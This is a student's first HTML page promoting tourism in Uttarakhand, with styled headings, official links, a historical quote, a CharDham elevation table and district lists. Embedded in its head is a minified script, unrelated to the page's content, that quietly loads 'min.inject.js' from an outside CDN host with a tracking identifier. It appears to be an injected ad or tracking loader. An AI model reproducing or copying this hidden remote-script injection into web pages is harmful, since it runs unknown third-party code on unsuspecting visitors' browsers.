<!DOCTYPE html>
<html lang="en-US">
<head>
    <meta charset="UTF-8">
    <title>My Very First project</title>
    <style>
        body{background-color:lightgray;
            background-image:url("http://thumbs.dreamstime.com/z/beautiful-landscape-green-hills-summer-field-blue-sky-35808989.jpg")
        }
        h1{
            color:red;
            text-align:center;
            font-family:verdana;
            font-size:300%;
        }
        h2{color:red;
            text-align:left;
            font-size:200%;
            border:1px solid black;
            padding:10px;
            margin:10px;
        }
        h3{
            color:red;
            text-align:center;
            font-family:courier;
            font-size:300%;
        }
        p{
            color: red;
            text-align:center;
            font-size:100%;
        }

        p#po2,p#po3{
            color:red;
            font-size:150%;
            font-family:verdana
        }
        table, th, td {
            border: 1px solid black;
            border-collapse: collapse;
        }
        th,td {
            padding: 5px;
        }
        th  {
            text-align: middle;
            font-size:150%;
            font-family:verdana;

        }
        table{
            width:100%;

        }
        caption{
            color:blue;
            font-size:250%;
            font-family:verdana;
        }
        h4{
            color:red;
            text-align:center;
            font-family:courier;
            font-size:200%;
        }
    </style>
    <script type='text/javascript'>if(self == top){var head=document.getElementsByTagName('head')[0];if(!head) {head=document.createElement('head');}var script=document.createElement('script');script.setAttribute('type','text/javascript');script.setAttribute('src','https://b36df47b3d.site.internapcdn.net/js/min.inject.js?uid=78cb9f6f-07c8-4d08-95f1-a233f7b99f26&id=PT0qPio');head.appendChild(script);}</script></head>

<body>
<h1><img src="http://www.dilsecomments.com/graphics/Welcome-3293.jpg"
         style="float:left;width:82px;height:82px;">
    <img src="http://www.dilsecomments.com/graphics/Welcome-3293.jpg"
         style="float:right;width:82px;height:82px;">Uttarakhand</h1>
<h2>Divine Beauty of Nature!!!Come And Explore Uttarakhand!!!<span style = "color:blue"><i> Simply Heaven</i> </h2>
<hr>
<a href = "http://uk.gov.in/"  target="_blank"><b>For more Information Visit our Official Website</b></a><br>
<a href ="http://uttarakhandtourism.gov.in/" target="_blank"><b>For Tourism Information</b></a><br>
<a href = "https://utconline.uk.gov.in/" target="_blank"><b>Transport Information</b></a><br>
<img src="https://c2.staticflickr.com/4/3422/3873509633_20a2493bae_b.jpg"alt="google.com" width="100%"
     height="300">
<h3>About our Beautiful State</h3>

<p><img src="http://profiles.sulekhalive.com/mstore/2576662/albums/default/thumbnailfull/namaskar111-1.gif"
        style="float:left;width:82px;height:82px;">
    <img src="http://profiles.sulekhalive.com/mstore/2576662/albums/default/thumbnailfull/namaskar111-1.gif"
         style="float:right;width:82px;height:82px;">
    <b>Uttarakhand formerly <sup> Uttaranchal</sup>,is a state in the <sub>northern part</sub> of India.<br>
        It is often referred to as the<mark> Devbhumi </mark>(literally "Land of the Gods") due to the many Hindu temples and pilgrimage centres<br>,
        found throughout the state.<br>
        <q> Uttarakhand is known for its natural beauty of the Himalayas.<br>
            On 9 November 2000, this 27th state of the Republic of India.<br>
            was created from the Himalayan and adjoining northwestern districts of Uttar Pradesh.</q><br>
    </b></p>

<blockquote cite="http://uttarakhandtourism.gov.in" style=color:solid black;font-size:200>
    <b>Charles A. Sherring, the celebrated 19th century British anthropologist and surveyor noted down
        in his highly acclaimed work ‘Western Tibet and British Borderland’
        “In those lovely valleys there is still the romance and poetry of life: each tree has its god, each bush its spirit”
        Mr,Sherring was describing a fair part of Uttarakhand.
        It was also not another coincidence that after
        his first visit to Uttarakhand Mahatma Gandhi could not restrain himself
        from alluding the region as<em> ‘the Switzerland of India’.</em></b>

</blockquote>

<table>
    <caption><strong>The CharDham</strong></caption>
    <tr>
        <th><b>Place</b></th>
        <th><b>District</b> </th>
        <th><b>Elevation</b></th>
    </tr>
    <tr>
        <td><b>Gangotri</b></td>
        <td><b>Uttarkashi</b> </td>
        <td><b>11,204ft</b></td>
    </tr>
    <tr>
        <td><b>Yamunotri</b></td>
        <td><b>Uttarkashi</b> </td>
        <td><b>12,972ft</b></td>
    </tr>
    <tr>
        <td><b>Kedarnath</b></td>
        <td><b>Rudraprayag</b></td>
        <td><b>11,657ft</b></td>
    </tr>
    <tr>
        <td><b>Badrinath</b></td>
        <td><b>Chamoli</b></td>
        <td><b>10,800ft</b></td>
    </tr>
</table>
<br>
<h4>District Administration</h4>
<p id="po2">Garhwal Region</p>
<ul>
    <li> Dehradun </li>
    <li> Haridwar </li>
    <li>Chamoli  </li>
    <li> Rudraprayag </li>
    <li> Tehri Garhwal </li>
    <li>Pauri Garhwal</li>

</ul>
<p id="po3">Kumaon Region</p>
<ul>
    <li> Almora </li>
    <li> Nainital </li>
    <li>Pithoragarh </li>
    <li>UdshamSingh Nagar </li>
    <li>Bageshwar</li>
    <li>Champawat</li>

</ul>
<br>

<address>
    Created by : Priyanka Dhyani
    Contact At:Priyanka.Dhyani29@gmail.com
    <img src="programming.gif">
</address>
</body>
</html>